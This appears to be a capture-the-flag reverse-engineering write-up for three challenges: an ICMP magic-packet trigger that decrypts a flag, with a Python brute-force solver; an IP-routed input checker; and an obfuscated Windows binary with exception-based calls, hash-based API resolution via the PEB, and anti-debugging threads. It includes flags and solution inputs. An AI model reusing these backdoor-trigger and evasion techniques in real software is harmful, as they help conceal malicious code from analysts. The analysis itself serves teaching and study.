p_gopacket_PacketSource->source.data = handle;
p_gopacket_PacketSource->decoder.tab = go_itab_github_com_google_gopacket_layers_LinkType_comma_github_com_google_gopacket_Decoder;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrierCX();
else
p_gopacket_PacketSource->decoder.data = &runtime_staticuint64s[v15];
// Receive packets from the Packets() channel until it is closed.
for ( c = (runtime_hchan_0 *)github_com_google_gopacket__ptr_PacketSource_Packets((github_com_google_gopacket_PacketSource *)p_gopacket_PacketSource);
;
c = c_1 )
{
promisc[0] = runtime_chanrecv2(c, &elem[1]);
if ( !promisc[0] )
break;
v4 = elem[1];
elem[1] = 0;
// Interface method call on the received packet; device_8 is then used as the base of the raw bytes.
device_8 = (*(__int64 (__golang **)(_QWORD))(v4 + 32))(*((_QWORD *)&v4 + 1));
// Slice bounds checks: the data must span at least 0x2E (46) bytes.
if ( timeout < 0x18 )
runtime_panicSliceAcap();
if ( timeout < 0x26 )
runtime_panicSliceAcap();
if ( timeout < 0x28 )
runtime_panicSliceAcap();
if ( timeout < 0x2E )
runtime_panicSliceAcap();
key_16 = device_8;
n0x22 = *(_QWORD *)promisc;
v40 = *(_DWORD *)(device_8 + 42); // dword at packet offset 42
v39 = *(_WORD *)(device_8 + 36); // word at packet offset 36
// Key bytes 0-1: (word@36 XOR high half of dword@42), byte-swapped.
array = runtime_makeslice((runtime__type_1 *)&RTYPE_uint8, 2, 2);
*array = __ROL2__(v39 ^ HIWORD(v40), 8);
// Kept for key bytes 14-15: (low half of dword@42 XOR word@36), byte-swapped.
v38 = __ROL2__(v40 ^ v39, 8);
device_8a.array = array;
device_8a.len = 2;
device_8a.cap = 2;
old = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8a, 6);
array_1 = old.array;
cap = old.cap;
key_1 = key_16;
// Key bytes 2-5: dword at packet offset 20.
*(_DWORD *)((char *)old.array + 2) = *(_DWORD *)(key_16 + 20);
if ( old.cap < 8uLL )
{
device_8b.array = old.array;
device_8b.len = 6;
device_8b.cap = old.cap;
olda = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8b, 8);
array_1 = olda.array;
cap = olda.cap;
key_1 = key_16;
}
// Key bytes 6-7: word at packet offset 36.
array_1[3] = *(_WORD *)(key_1 + 36);
if ( cap < 0xC )
{
device_8c.array = array_1;
device_8c.len = 8;
device_8c.cap = cap;
oldb = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8c, 12);
array_1 = oldb.array;
cap = oldb.cap;
key_1 = key_16;
}
// Key bytes 8-11: dword at packet offset 42.
*((_DWORD *)array_1 + 2) = *(_DWORD *)(key_1 + 42);
if ( cap < 0xE )
{
device_8d.array = array_1;
device_8d.len = 12;
device_8d.cap = cap;
oldc = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8d, 14);
array_1 = oldc.array;
cap = oldc.cap;
key_1 = key_16;
}
// Key bytes 12-13: word at packet offset 38.
array_1[6] = *(_WORD *)(key_1 + 38);
if ( cap < 0x10 )
{
device_8e.array = array_1;
device_8e.len = 14;
device_8e.cap = cap;
oldd = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8e, 16);
array_1 = oldd.array;
cap = oldd.cap;
key_1 = key_16;
}
// Key bytes 14-15: the value saved in v38 above.
array_1[7] = v38;
// Trigger condition: word@38 == 0x1337, byte-swapped word@16 == 32, dword@42 == 0xE55FDEC6.
if ( *(_WORD *)(key_1 + 38) == 0x1337
&& __ROL2__(*(_WORD *)(key_1 + 16), 8) == 32
&& *(_DWORD *)(key_1 + 42) == 0xE55FDEC6 )
{
if ( n0x22 <= 0x22 )
runtime_panicIndex();
// ...and the byte at packet offset 34 must be 8.
if ( *(_BYTE *)(key_1 + 34) == 8 )
{
cap_1 = cap;
key = (uint8 *)array_1;
// Hard-coded 32-byte ciphertext, stored as four 64-bit words.
b_8 = runtime_newobject((runtime__type_1 *)&RTYPE__32_uint8);
*b_8 = 0xC07EDFB429A5F151LL;
b_8[1] = 0xB34E3D248F2F3B2ALL;
b_8[2] = 0x8CDD9C0BCFB0ED5ALL;
b_8[3] = 0xC64C43E9B0EE6CDLL;
// AES block cipher keyed with the 16 assembled bytes.
device.array = key;
device.len = 16;
device.cap = cap_1;
*(_OWORD *)&promisca.len = (unsigned __int128)crypto_aes_NewCipher(device);
ptr = (uint8 *)runtime_makeslice((runtime__type_1 *)&RTYPE_uint8, 32, 32);
devicea = *(string_0 *)&promisca.len;
// The CBC decrypter receives the same 16 bytes as its IV.
promisca.array = key;
promisca.len = 16;
promisca.cap = cap_1;
olde = crypto_cipher_NewCBCDecrypter((crypto_cipher_Block)devicea, promisca);
// Decrypt the 32 bytes of b_8 into ptr through the BlockMode interface.
((void (__golang *)(void *, uint8 *, __int64, __int64, _QWORD *, __int64, __int64))olde.tab[1].inter)(olde.data, ptr, 32, 32, b_8, 32, 32);
// Convert the plaintext to a string and print it to os.Stdout with fmt.Fprintln.
deviceb = runtime_slicebytetostring(0, ptr, 32);
promiscb = runtime_convTstring(deviceb);
*(_QWORD *)&elem[0] = &RTYPE_string;
*((_QWORD *)&elem[0] + 1) = promiscb;
devicec.str = (uint8 *)go_itab__ptr_os_File_comma_io_Writer;
devicec.len = (int)os_Stdout;
promiscc.array = (interface__0 *)elem;
promiscc.len = 1;
promiscc.cap = 1;
fmt_Fprintln((io_Writer_0)devicec, promiscc);
}
}
}
}

This function keeps waiting for ICMP packets. If the packet length is 32, the type is 0x08, the identifier is 0x1337, and the first int32 of the payload is 0xE55FDEC6, it tries to decrypt the 32-byte ciphertext using AES. The key is constructed from fields of the packet.

Decrypt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from Crypto.Cipher import AES

def n2ble(na, n=8):
    """Serialize the integers in ``na`` as consecutive ``n``-byte little-endian fields.

    Returns an immutable ``bytes`` object; an empty ``na`` yields ``b""``.
    """
    return b"".join(a.to_bytes(n, "little") for a in na)

# The four 64-bit constants that net_http_init_0 stores into its 32-byte buffer, in order.
cip = [
0xC07EDFB429A5F151,
0xB34E3D248F2F3B2A,
0x8CDD9C0BCFB0ED5A,
0x0C64C43E9B0EE6CD,
]
# Each constant is laid out little-endian to form the ciphertext bytes
# (assumes a little-endian target — TODO confirm).
CIPHERTEXT = n2ble(cip, 8)

# Bytes that read back as 0xE55FDEC6 when loaded as a little-endian dword.
PAYLOAD = bytes.fromhex("c6de5fe5")
# Bytes that read back as 0x1337 when loaded as a little-endian word.
IDENT_BYTES = bytes.fromhex("3713")

# Split the payload dword into the two 16-bit halves that are XORed with the checksum word.
payload_le = int.from_bytes(PAYLOAD, "little")
hi16 = (payload_le >> 16) & 0xFFFF
lo16 = payload_le & 0xFFFF

def icmp_checksum(data: bytes) -> int:
    """Return the 16-bit one's-complement checksum of ``data``.

    The data is summed as big-endian 16-bit words (an odd-length input is
    padded with one zero byte), carries are folded back into the low 16 bits,
    and the complement of the sum is returned.
    """
    if len(data) % 2 == 1:
        data += b"\x00"
    s = 0
    for i in range(0, len(data), 2):
        w = (data[i] << 8) | data[i + 1]
        s += w
        # Fold the carry after every word so the sum stays within 17 bits.
        s = (s & 0xFFFF) + (s >> 16)
    # One final fold in case the last addition produced a carry.
    s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF

def build_key(ip_bytes_6_9: bytes, code: int, seq_bytes: bytes):
    """Rebuild the 16-byte AES key the binary derives from one ICMP echo request.

    ip_bytes_6_9 -- the 4 bytes the binary copies from packet offset 20
                    (bytes 6..9 of the IP header).
    code         -- ICMP code byte used when recomputing the checksum.
    seq_bytes    -- the 2 sequence-number bytes as they appear on the wire.

    Key layout: (csum ^ payload_hi16) | ip_bytes_6_9 | csum | PAYLOAD |
    IDENT_BYTES | (csum ^ payload_lo16).
    """
    # Checksum over the ICMP message with its checksum field zeroed.
    pseudo = bytes([8, code, 0, 0]) + IDENT_BYTES + seq_bytes + PAYLOAD
    csum_be = icmp_checksum(pseudo)
    csum_bytes = csum_be.to_bytes(2, "big")
    # The binary loads the checksum field as a little-endian word before XORing.
    csum_le = int.from_bytes(csum_bytes, "little")
    a = (csum_le ^ hi16) & 0xFFFF
    b = (csum_le ^ lo16) & 0xFFFF
    # The binary byte-swaps both XOR results (__ROL2__ by 8) before storing
    # them, which is the same as writing them big-endian.
    key = (
        a.to_bytes(2, "big") +
        ip_bytes_6_9 +
        csum_bytes +
        PAYLOAD +
        IDENT_BYTES +
        b.to_bytes(2, "big")
    )
    return key

def decrypt(key: bytes) -> bytes:
    """Decrypt CIPHERTEXT with AES-CBC, using ``key`` as both the key and the IV."""
    cipher = AES.new(key, AES.MODE_CBC, iv=key)
    return cipher.decrypt(CIPHERTEXT)

# Candidate values for IP header bytes 6..9 (flags/fragment offset, TTL,
# protocol): DF bit clear or set, TTL 64 or 128, protocol 1 (ICMP).
ip_candidates = [
    bytes.fromhex("00004001"),
    bytes.fromhex("40004001"),
    bytes.fromhex("00008001"),
    bytes.fromhex("40008001"),
]

codes = [0]
# Brute-force the 16-bit sequence number for every header candidate and stop
# the whole search at the first plaintext that contains the flag prefix.
found = False
for ipb in ip_candidates:
    for code in codes:
        for seq in range(65536):
            seq_bytes = seq.to_bytes(2, "little")
            key = build_key(ipb, code, seq_bytes)
            pt = decrypt(key)
            if b"CMO{" in pt:
                print(pt)
                found = True
                break
        if found:
            break
    if found:
        break

CMO{fUn_w1th_m4g1c_p4ck3t5}

connected

This program registers 10 IPs in main, along with 9 lambda functions that parse the input:

IP_HEX IP Lambda Function ID Received
0x260FC72A 38.15.199.42 1 input
0x260FC729 38.15.199.41 2→1 (if directly call) My complicated firewall rules told me to not talk to you (if directly call)
0x260FC728 38.15.199.40 3→1 OK
0x64191A0A 100.25.26.10 4→9→4→7→9→7→4→8→9→8→4→6→9→6→4→1
(if input format is msg_<xxx>)
I don’t want to talk to you (if format wrong or input wrong)
0x64191A0B 100.25.26.11 5→1 Okay, I did some spamming. You are welcome!
0x64191A0F 100.25.26.15 6→9→6→1 1 (if all bytes are printable and ascii are even) / 0 (else)
0x400E0319 64.14.3.25 7→9→7→1 strlen(input)
0x400E031D 64.14.3.29 8→9→8→1 weak hash function
0x53305C05 83.48.92.5 - (user IP) -
0x53305C08 83.48.92.8 9→1 xor 0x42

From the table we can see function 1 is for the final output, and function 4 is the most important part. For chain 4, the constraints are: length == 8, ascii == even, hash == 0x06022e46. A solution is: :"*$$*":

1
2
3
    what: msg_:"*$$*":
where: 100.25.26.10
received: CMO{secret_code_v9hcdkd2}

CMO{secret_code_jx65692q}

moment

The code of this program is very chaotic, and trying to use a debugger makes the program die before main. Note that this program has a huge init function table:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
.rdata:00000001401128A8 ; const _PVFV First_
.rdata:00000001401128A8 First_ dq 0
.rdata:00000001401128B0 dq offset ?pre_cpp_initialization@@YAXXZ
.rdata:00000001401128B8 dq offset atexit_unknown_libname_8
.rdata:00000001401128C0 dq offset longfunc_3C615
.rdata:00000001401128C8 dq offset CRC32_Choice
.rdata:00000001401128D0 dq offset pf_1
.rdata:00000001401128D8 dq offset pf_2
.rdata:00000001401128E0 dq offset xyobfunc
.rdata:00000001401128E8 dq offset SetConsole
.rdata:00000001401128F0 dq offset fread_5851F42D4C957F2D
.rdata:00000001401128F8 dq offset OpenSCManagerService
.rdata:0000000140112900 dq offset longfunc_10735
.rdata:0000000140112908 dq offset atexit_1400BFFD0
.rdata:0000000140112910 dq offset atexit_d_1400BFF60
.rdata:0000000140112918 dq offset atexit_1400BFEA0
.rdata:0000000140112920 dq offset atexit_140102BA0
.rdata:0000000140112928 dq offset atexit_140102A50
.rdata:0000000140112930 dq offset atexit_d_140102A20
.rdata:0000000140112938 dq offset atexit_d_1401029F0
.rdata:0000000140112940 dq offset atexit_d_1401029C0
.rdata:0000000140112948 dq offset atexit_1401028D0
.rdata:0000000140112950 dq offset atexit_140102810
.rdata:0000000140112958 dq offset CreateEvent_14012B3D8_atexit_140102800
.rdata:0000000140112960 dq offset GetCurrentThread_14012B420
.rdata:0000000140112968 dq offset GetCurrentThread_14012B470
.rdata:0000000140112970 dq offset GetCurrentThread_14012B4C0

longfunc_3C615 compiles a regex to find all *.dll files at the beginning. However, in debugging, the program accessed a wrong memory addr at .text:000000014001916D call sub_1400BB6A0 in longfunc_3C615, and this function sub_1400BB6A0 is very weird:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
.text:00000001400BB6A0 ; _QWORD *__fastcall sub_1400BB6A0(_QWORD *)
.text:00000001400BB6A0 sub_1400BB6A0 proc near
.text:00000001400BB6A0 var_40 = qword ptr -40h
.text:00000001400BB6A0 arg_10 = qword ptr 20h
.text:00000001400BB6A0 arg_18 = qword ptr 28h
.text:00000001400BB6A0 ; __unwind { // __C_specific_handler
.text:00000001400BB6A0 push rbp
.text:00000001400BB6A1 push r15
.text:00000001400BB6A3 push r14
.text:00000001400BB6A5 push r13
.text:00000001400BB6A7 push r12
.text:00000001400BB6A9 push rsi
.text:00000001400BB6AA push rdi
.text:00000001400BB6AB push rbx
.text:00000001400BB6AC sub rsp, 28h
.text:00000001400BB6B0 lea rbp, [rsp+20h]
.text:00000001400BB6B5 mov rsi, rcx ; rsi = first argument (output slot)
.text:00000001400BB6B8 mov [rbp+40h+arg_10], r8 ; spill the 3rd and 4th register arguments to their home slots
.text:00000001400BB6BC mov [rbp+40h+arg_18], r9
.text:00000001400BB6C0 lea rax, [rbp+40h+arg_10]
.text:00000001400BB6C4 mov [rbp+40h+var_40], rax ; var_40 = cursor over the spilled arguments
.text:00000001400BB6C8 call sub_1400BEF20 ; returns a function pointer in rax, which is called just below
.text:00000001400BB6CD xor ebx, ebx ; rbx = output byte index
.text:00000001400BB6CF mov edx, 4
.text:00000001400BB6D4 xor ecx, ecx
.text:00000001400BB6D6 mov r8d, 3000h
.text:00000001400BB6DC mov r9d, 4
.text:00000001400BB6E2 call rax ; rax(0, 4, 3000h, 4)
.text:00000001400BB6E4 mov [rsi], rax ; store the returned pointer in the output slot
.text:00000001400BB6E7 mov dword ptr [rax], 0 ; zero its first 4 bytes
.text:00000001400BB6ED mov r15d, 77190988h
.text:00000001400BB6F3 mov rdi, 99A33F9AD5D7800Bh
.text:00000001400BB6FD nop dword ptr [rax]
.text:00000001400BB700 loc_1400BB700: ; CODE XREF: sub_1400BB6A0:loc_1400BB760↓j
.text:00000001400BB700 mov rax, [rbp+40h+var_40]
.text:00000001400BB704 lea rcx, [rax+8]
.text:00000001400BB708 mov [rbp+40h+var_40], rcx ; advance the argument cursor by 8 bytes
.text:00000001400BB70C cmp qword ptr [rsi], 0
.text:00000001400BB710 jz short loc_1400BB77C
.text:00000001400BB712 movsxd r13, dword ptr [rax] ; r13 = current argument as a signed dword
.text:00000001400BB715 shl r13, 4 ; ...scaled by 16: index into 16-byte entries
.text:00000001400BB719 lea rax, unk_140111680
.text:00000001400BB720 lea r12, [rax+r13] ; r12 = address of the selected table entry
.text:00000001400BB724 mov r14d, ds:7FFE02F8h ; dword read from fixed address 7FFE02F8h
.text:00000001400BB72C xor r14d, r15d
.text:00000001400BB72F add r14d, 0CD42AD3Ah ; r14 = computed call target
.text:00000001400BB736 loc_1400BB736: ; DATA XREF: .rdata:00000001401208D0↓o
.text:00000001400BB736 ; __try { // __except at 1400BB764
.text:00000001400BB736 mov ecx, 9626887h
.text:00000001400BB73B call r14 ; call through the computed pointer, inside the __try range
.text:00000001400BB73E call nullsub_1
.text:00000001400BB743 mov rcx, rdi
.text:00000001400BB746 call r14
.text:00000001400BB749 loc_1400BB749: ; DATA XREF: .rdata:00000001401208D0↓o
.text:00000001400BB749 xor al, 9Ah
.text:00000001400BB74B mov rcx, [rsi]
.text:00000001400BB74E mov [rcx+rbx], al
.text:00000001400BB751 jmp qword ptr cs:loc_1400BB760
.text:00000001400BB757 db 30h ; 0
.text:00000001400BB758 db 53h ; S
.text:00000001400BB759 loc_1400BB759: ; CODE XREF: sub_1400BB6A0+DA↓j
.text:00000001400BB759 inc rbx
.text:00000001400BB75C cmp rbx, 4
.text:00000001400BB760 loc_1400BB760: ; DATA XREF: sub_1400BB6A0+B1↑r
.text:00000001400BB760 jnz short loc_1400BB700
.text:00000001400BB762 jmp short loc_1400BB77C
.text:00000001400BB764 ; __except(1) // owned by 1400BB736
.text:00000001400BB764 lea rax, unk_140111680
.text:00000001400BB764 ; DATA XREF: .rdata:00000001401208D0↓o
.text:00000001400BB76B call qword ptr [r13+rax+8] ; exception path: call the function pointer at entry + 8
.text:00000001400BB770 xor al, [r12] ; XOR its result with the entry's first byte
.text:00000001400BB774 mov rcx, [rsi]
.text:00000001400BB777 mov [rcx+rbx], al ; store as output byte rbx
.text:00000001400BB77A jmp short loc_1400BB759
.text:00000001400BB77C loc_1400BB77C: ; CODE XREF: sub_1400BB6A0+70↑j
.text:00000001400BB77C ; sub_1400BB6A0+C2↑j
.text:00000001400BB77C mov rax, rsi
.text:00000001400BB77F add rsp, 28h
.text:00000001400BB783 pop rbx
.text:00000001400BB784 pop rdi
.text:00000001400BB785 pop rsi
.text:00000001400BB786 pop r12
.text:00000001400BB788 pop r13
.text:00000001400BB78A pop r14
.text:00000001400BB78C pop r15
.text:00000001400BB78E pop rbp
.text:00000001400BB78F retn
.text:00000001400BB78F ; } // starts at 1400BB6A0
.text:00000001400BB78F sub_1400BB6A0 endp

In fact, this function relies on exception handling, and sub_1400BEF20 is a resolver that looks up DLL functions by hash; in every call made from longfunc_3C615, the function it resolves is kernel32!VirtualAlloc. Once the exception is passed back to the program instead of being handled by the debugger, the program runs into main successfully. In main, the program calls a loop function inside a while (1) loop, and sub_140108DE0 is called in that loop; this function creates many threads for anti-debugging:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
// Decompiler output for the watchdog loop; it never returns. Each pass of the outer
// while ( 1 ) does three things:
//   1. walks func_table and starts one thread per eligible entry,
//   2. while bit 0 of byte_14012B5FD is still clear, resolves one export by name hash
//      and calls it,
//   3. waits until a deadline of "now + 500000000" (in the converted time unit) has passed.
// NOTE(review): several callee names (DuplicateHandle, IsDBCSLeadByteEx, SetLastError,
// GetProcessAffinityMask, TlsSetValue, GetHandleInformation, ResetEvent, GetThreadPriority)
// are called with argument lists that do not look like the Win32 prototypes; they are
// presumably mis-resolved symbols -- confirm before relying on the names.
void __noreturn call_func_tables()
{
v56 = -2;
while ( 1 )
{
// NOTE(review): the argument is cast to _Mtx_t, so this is presumably a mutex lock that
// pairs with the GetThreadPriority((_Mtx_t)...) call at the end of the loop -- confirm.
if ( DuplicateHandle((_Mtx_t)&dword_14012B420) )
goto LABEL_74;
if ( HIDWORD(qword_14012B468) == 0x7FFFFFFF )
{
LABEL_75:
HIDWORD(qword_14012B468) = 2147483646;
IsDBCSLeadByteEx(6u, TestChar);
__debugbreak();
}
// Walk func_table two pointer-sized slots at a time (function pointer, then a 32-bit tag
// at byte offset 8 and a byte flag at byte offset 12) until the symbol that follows it.
for ( p_??_R0?AVbad_array_new_length@std@@@8 = &func_table;
p_??_R0?AVbad_array_new_length@std@@@8 != (__int64 (__fastcall **)())&std::bad_array_new_length `RTTI Type Descriptor';
p_??_R0?AVbad_array_new_length@std@@@8 += 2 )
{
// Start the entry when its flag byte is set, or unconditionally while bit 0 of
// byte_14012B5FD is still clear.
if ( *((_BYTE *)p_??_R0?AVbad_array_new_length@std@@@8 + 12) || (byte_14012B5FD & 1) == 0 )
{
*((_BYTE *)p_??_R0?AVbad_array_new_length@std@@@8 + 12) = 0;
v2 = *((_DWORD *)p_??_R0?AVbad_array_new_length@std@@@8 + 2);
v3 = *p_??_R0?AVbad_array_new_length@std@@@8;
// Thread argument: { tag, table function pointer, sub_1401044F0 }.
ArgList = operator new(0x18u);
*(_DWORD *)ArgList = v2;
ArgList[1] = v3;
ArgList[2] = sub_1401044F0;
*(_QWORD *)ThrdAddr = beginthreadex(0, 0, sub_140109590, ArgList, 0, &ThrdAddr[2]);
if ( !*(_QWORD *)ThrdAddr )
{
ThrdAddr[2] = 0;
IsDBCSLeadByteEx(6u, TestChar_1);
// Failure chain: each label falls through to the next and ends in LABEL_75 (__debugbreak).
LABEL_72:
IsDBCSLeadByteEx(1u, TestChar_2);
LABEL_73:
IsDBCSLeadByteEx(1u, TestChar_1);
LABEL_74:
IsDBCSLeadByteEx(5u, TestChar);
goto LABEL_75;
}
if ( !ThrdAddr[2] )
goto LABEL_73;
__asm
{
vmovups xmm0, xmmword ptr [rbp+40h+var_50]
vmovaps xmmword ptr [rbp+40h+Buffer._Hnd], xmm0
}
if ( SetLastError(&Buffer) )
goto LABEL_72;
}
}
// Skip the export resolution once bit 0 of byte_14012B5FD has been set.
if ( (byte_14012B5FD & 1) != 0 )
goto LABEL_42;
// j  = wanted module-name hash (0 accepts the first list entry examined),
// v10 = wanted export-name hash.
j = 0;
__asm { rdgsbase rbx }
v10 = -38083264;
// NOTE(review): the +96 / +24 / +16 dereference chain off the GS base is presumably
// TEB->PEB->Ldr->module list -- confirm against the structure layouts.
for ( i = **(__int64 ***)(*(_QWORD *)(*(_QWORD *)(_RBX + 96) + 24LL) + 16LL); ; i = (__int64 *)*i )
{
if ( !j )
goto LABEL_78;
// Xor-then-multiply hash, seed -1145602568 (same value as 0xBBB77DF8 used below),
// multiplier 16777619 (0x1000193), over every second byte of the buffer at i[12].
// The length comes from the 16-bit field at byte offset 88, minus 8.
v12 = -1145602568;
if ( (unsigned __int16)(*((_WORD *)i + 44) - 8) >= 2u )
{
v13 = 0;
do
{
v12 = 16777619 * (v12 ^ *(char *)(i[12] + v13));
v13 += 2;
}
while ( 2 * ((unsigned __int64)(unsigned __int16)(*((_WORD *)i + 44) - 8) >> 1) != v13 );
}
if ( v12 == j )
{
LABEL_78:
// NOTE(review): v14 is presumably the module image base, v14+60 the e_lfanew field and
// +136/+140 the export directory RVA and size of a PE32+ header -- confirm.
v14 = i[6];
v15 = *(int *)(v14 + 60);
v16 = *(unsigned int *)(v14 + v15 + 136);
v17 = (unsigned int *)(v14 + v16);
if ( *(_DWORD *)(v14 + v15 + 136) )
break;
}
LABEL_17:
;
}
v18 = *(unsigned int *)(v14 + v15 + 140);
v19 = v17[6];
// Scan the name table from the last index down, hashing each NUL-terminated name with
// the same seed and multiplier, until the hash equals v10. When the names run out,
// control goes back to LABEL_17 to try the next list entry.
do
{
if ( v19-- == 0 )
goto LABEL_17;
v22 = *(unsigned int *)(v14 + v17[8] + 4 * v19);
v23 = *(_BYTE *)(v14 + v22);
if ( v23 )
{
v24 = (char *)(v14 + 1 + v22);
v20 = -1145602568;
do
{
v20 = 16777619 * (v20 ^ v23);
v23 = *v24++;
}
while ( v23 );
}
else
{
v20 = -1145602568;
}
}
while ( v20 != v10 );
// Map the matching name index through the 16-bit table at v17[9] into the 32-bit
// table at v17[7] to obtain the target offset.
v25 = *(unsigned int *)(v14 + v17[7] + 4LL * *(unsigned __int16 *)(v14 + v17[9] + 2LL * (unsigned int)v19));
v26 = (char *)(v25 + v14);
// The resolved address lies inside the export directory itself: it is treated as a
// "NAME.NAME" string and handled by the code after the outer loop (bottom of the function).
if ( (unsigned int)v16 < (unsigned int)v25 && (char *)v17 + v18 > v26 )
break;
// Call the resolved export with the upper qword of xmmword_14012B2B8 as its argument.
((void (__fastcall *)(_QWORD))v26)(*((_QWORD *)&xmmword_14012B2B8 + 1));
// Compare-exchange on byte_14012B5FD with new value 1 and comparand byte_14012B5FC;
// on mismatch the observed value is stored back into byte_14012B5FC.
v31 = byte_14012B5FC;
v30 = _InterlockedCompareExchange8(&byte_14012B5FD, 1, byte_14012B5FC);
if ( v31 != v30 )
byte_14012B5FC = v30;
LABEL_42:
// Convert a counter (v33) to units of 1000000000 per n24000000, with fast paths for
// the values 10000000 and 24000000.
// NOTE(review): presumably performance-counter frequency / counter converted to
// nanoseconds -- confirm.
n24000000 = GetProcessAffinityMask();
v33 = TlsSetValue();
v34 = v33;
if ( n24000000 == 10000000 )
{
v35 = 100 * v33;
}
else if ( n24000000 == 24000000 )
{
v35 = 1000000000 * (v33 / 24000000) + 1000000000 * (v33 % 24000000) / 24000000;
}
else
{
if ( (n24000000 | (unsigned __int64)v33) >> 32 )
{
v49 = v33 / n24000000;
v50 = v34 % n24000000;
}
else
{
v50 = (unsigned int)v33 % (unsigned int)n24000000;
v49 = (unsigned int)v33 / (unsigned int)n24000000;
}
v51 = 1000000000 * v49;
v52 = 1000000000 * v50;
if ( ((1000000000 * v50) | (unsigned __int64)n24000000) >> 32 )
v53 = v52 / n24000000;
else
v53 = (unsigned int)v52 / (unsigned int)n24000000;
v35 = v51 + v53;
}
// Deadline = now + 500000000, saturated at the maximum signed 64-bit value.
v36 = v35 + 500000000;
if ( v35 >= 0x7FFFFFFFE2329AFFLL )
v36 = 0x7FFFFFFFFFFFFFFFLL;
// Wait loop: recompute "now" with the same conversion and leave once the deadline passed.
while ( 1 )
{
n24000000_1 = GetProcessAffinityMask();
v39 = TlsSetValue();
v40 = v39;
if ( n24000000_1 == 10000000 )
{
v41 = 100 * v39;
}
else if ( n24000000_1 == 24000000 )
{
v41 = 1000000000 * (v39 / 24000000) + 1000000000 * (v39 % 24000000) / 24000000;
}
else
{
if ( (n24000000_1 | (unsigned __int64)v39) >> 32 )
{
v44 = v39 / n24000000_1;
v45 = v40 % n24000000_1;
}
else
{
v45 = (unsigned int)v39 % (unsigned int)n24000000_1;
v44 = (unsigned int)v39 / (unsigned int)n24000000_1;
}
v46 = 1000000000 * v44;
v47 = 1000000000 * v45;
v48 = ((1000000000 * v45) | (unsigned __int64)n24000000_1) >> 32
? v47 / n24000000_1
: (unsigned int)v47 / (unsigned int)n24000000_1;
v41 = v46 + v48;
}
v42 = v36 - v41;
if ( v36 <= v41 )
break;
// Remaining time is capped at 864000000000000, added to 100 * GetHandleInformation(),
// and split into a quotient and remainder of 1000000000 stored in Buffer.
// NOTE(review): the call on Buffer (cast to xtime) is presumably a timed sleep -- confirm.
v43 = 100 * GetHandleInformation();
if ( v42 >= 864000000000000LL )
v42 = 864000000000000LL;
v37 = v42 + v43;
Buffer._Hnd = (void *)(v37 / 1000000000);
Buffer._Id = v37 % 1000000000;
ResetEvent((const xtime *)&Buffer);
}
GetThreadPriority((_Mtx_t)&dword_14012B420);
}
// Reached via the break above: v26 points at a string. Hash the part before the '.'
// (character 46) into j and the part after it into v10, then restart the list walk at
// LABEL_17 with the new pair of hashes.
n46 = *v26;
v10 = 0xBBB77DF8;
for ( j = 0xBBB77DF8; n46 != 46; ++v26 )
{
j = 0x1000193 * (j ^ n46);
n46 = v26[1];
}
v28 = v26[1];
if ( v28 )
{
v29 = v26 + 2;
v10 = 0xBBB77DF8;
do
{
v10 = 0x1000193 * (v10 ^ v28);
v28 = *v29++;
}
while ( v28 );
}
i = ***(__int64 ****)(*(_QWORD *)(*(_QWORD *)(_RBX + 96) + 24LL) + 16LL);
goto LABEL_17;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
.data:00007FF737ACA4A0 func_table dq offset func_table_1_longfunc_9663
.data:00007FF737ACA4A8 dq 77190988h
.data:00007FF737ACA4B0 dq offset func_table_2
.data:00007FF737ACA4B8 dq 77190989h
.data:00007FF737ACA4C0 dq offset func_table_3
.data:00007FF737ACA4C8 dq 7719098Ah
.data:00007FF737ACA4D0 dq offset func_table_4
.data:00007FF737ACA4D8 dq 7719098Bh
.data:00007FF737ACA4E0 dq offset func_table_5
.data:00007FF737ACA4E8 dq 7719098Ch
.data:00007FF737ACA4F0 dq offset func_table_6
.data:00007FF737ACA4F8 dq 7719098Dh
.data:00007FF737ACA500 dq offset func_table_7_longfunc_B6EE
.data:00007FF737ACA508 dq 7719098Eh
.data:00007FF737ACA510 dq offset func_table_8
.data:00007FF737ACA518 dq 7719098Fh
.data:00007FF737ACA520 dq offset func_table_9
.data:00007FF737ACA528 dq 77190980h
.data:00007FF737ACA530 dq offset func_table_10
.data:00007FF737ACA538 dq 77190981h
.data:00007FF737ACA540 dq offset func_table_11
.data:00007FF737ACA548 dq 77190982h
.data:00007FF737ACA550 dq offset func_table_12
.data:00007FF737ACA558 dq 77190983h
.data:00007FF737ACA560 dq offset func_table_13
.data:00007FF737ACA568 dq 77190984h
.data:00007FF737ACA570 dq offset func_table_14
